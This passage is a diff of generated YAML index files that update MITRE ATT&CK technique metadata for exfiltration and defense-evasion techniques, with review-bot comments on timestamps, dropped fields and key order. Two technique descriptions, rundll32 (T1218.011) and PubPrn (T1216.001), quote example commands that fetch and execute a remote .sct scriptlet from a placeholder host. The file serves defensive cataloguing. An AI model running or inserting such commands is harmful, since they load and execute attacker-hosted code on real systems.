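Review bot: `modified` for T1029 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-28T00:26:48.769Z`. A regressing modification time normally means a stale source was used; here the same pattern appears on T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052 and T1048.003, and every removed stamp ends in `.188Z`, which suggests the old values were synthetic and the new ones come from the original objects. Worth one sentence in the commit message so the next reader does not take it for data loss.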
@@ -60258,8 +61149,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
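Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed here without a replacement, unlike objects elsewhere in the file that go from `3.1.0` to `3.2.0`, so T1029 ends up with no attack spec version at all. If any tooling reads that field (for example to decide which keys to expect), it needs to tolerate its absence, or the generator should emit whatever version the source object actually carries.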
@@ -60306,7 +61195,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -60326,7 +61214,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60348,8 +61236,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -60403,7 +61289,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -60428,7 +61313,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -60463,12 +61348,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60493,11 +61376,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
@@ -60540,9 +61422,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -60589,7 +61470,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -60615,7 +61495,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60648,13 +61528,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -60703,12 +61581,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -60744,12 +61621,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -60758,7 +61634,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -60782,9 +61657,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -60807,7 +61681,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -60829,8 +61703,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -60881,7 +61753,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -60931,7 +61802,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -60956,7 +61826,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -60979,13 +61849,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61026,9 +61894,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61076,7 +61943,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61098,7 +61964,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61122,12 +61988,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61191,6 +62055,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml
index 6bc8c6df5f..ecaec68168 100644
--- a/atomics/Indexes/iaas_aws-index.yaml
+++ b/atomics/Indexes/iaas_aws-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
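Review bot: the inserted citation keys `Akami Frog4Shell 2024` and `Sysdig Fileless Malware 23022` look like typos, but they must stay exactly as written because they key into the `external_references` entries added later in this file (`source_name: Akami Frog4Shell 2024`, `source_name: Sysdig Fileless Malware 23022`); hand-correcting them in a generated index would break the citation links and be overwritten on the next regeneration. Separately, because this description is stored as a double-quoted folded scalar, a two-sentence addition re-wraps the whole paragraph; the `description: |-` literal block style already used for T1567 would confine such edits to the lines that actually changed.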
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
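Review bot: `x_mitre_platforms` for T1218.011 is `Windows` only, yet the entry sits under `defense-evasion` in `atomics/Indexes/iaas_aws-index.yaml` alongside other Windows-only techniques such as T1055.011, each with `atomic_tests: []`. This predates the patch, but if the per-platform indexes are meant to be scoped to their platform, filtering on `x_mitre_platforms` during generation would drop these entries and shrink both the file and this diff considerably.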
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
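Review bot: `x_mitre_permissions_required: - root` is dropped from T1556.003 with no replacement, just as `x_mitre_network_requirements: false` is dropped from T1020.001 and T1048 earlier in the patch, so the object no longer records that root is needed; anything downstream that filters on permissions required loses that signal here. The roughly forty lines removed in the preceding hunk all reappear in this one in a different key order, which buries the real changes (`modified`, version `2.0` to `2.1`, spec `2.1.0` to `3.2.0`, the new `revoked: false` and `x_mitre_deprecated: false`); a stable key order in the generator would make such hunks readable.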
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
